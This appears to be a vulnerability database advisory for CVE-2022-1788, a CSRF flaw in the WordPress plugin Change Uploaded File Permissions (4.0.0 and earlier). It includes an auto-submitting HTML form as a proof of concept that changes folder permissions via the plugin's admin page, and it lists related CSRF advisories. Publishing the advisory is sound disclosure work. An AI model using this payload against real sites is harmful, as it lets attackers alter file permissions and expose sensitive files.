Change Uploaded File Permissions <= 4.0.0 – File Permission Update via CSRF | CVE 2022-1788 | Plugin Vulnerabilities

Description

Due to missing checks the plugin is vulnerable to CSRF attacks. This can be used to change the file and folder permissions of any folder. This could be problematic when specific files like ini files are made readable for everyone due to this.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=uploadedfilepermissions" method="POST">
    <input type="text" name="sk_wproot_folder" value="/www/htdocs/ttttt/example.com/wp-content/uploads">
    <input type="text" name="sk_updateroot" value="true">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

change-uploaded-file-permissions

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

c39719e5-dadd-4414-a96d-5e70a1e3d462

Timeline

Publicly Published

2022-05-23 (about 1 years ago)

Added

2022-05-23 (about 1 years ago)

Last Updated

2023-02-17 (about 1 years ago)

Other

Published

Title

Published

2020-10-29

Title

WordPress < 5.5.2 - Cross-Site Request Forgery (CSRF) to Change Theme Background

Published

2023-10-27

Title

WooHoo Newspaper Magazine Theme <= 2.5.3 - Settings Update via CSRF

Published

2019-02-23

Title

Peters Login Redirect <= 2.9.1 - Multiple CSRF

Published

2023-07-10

Title

Custom Field Template < 2.5.9 - Cross-Site Request Forgery

Published

2024-04-05

Title

WordPress Tooltips < 9.5.3 - Cross-Site Request Forgery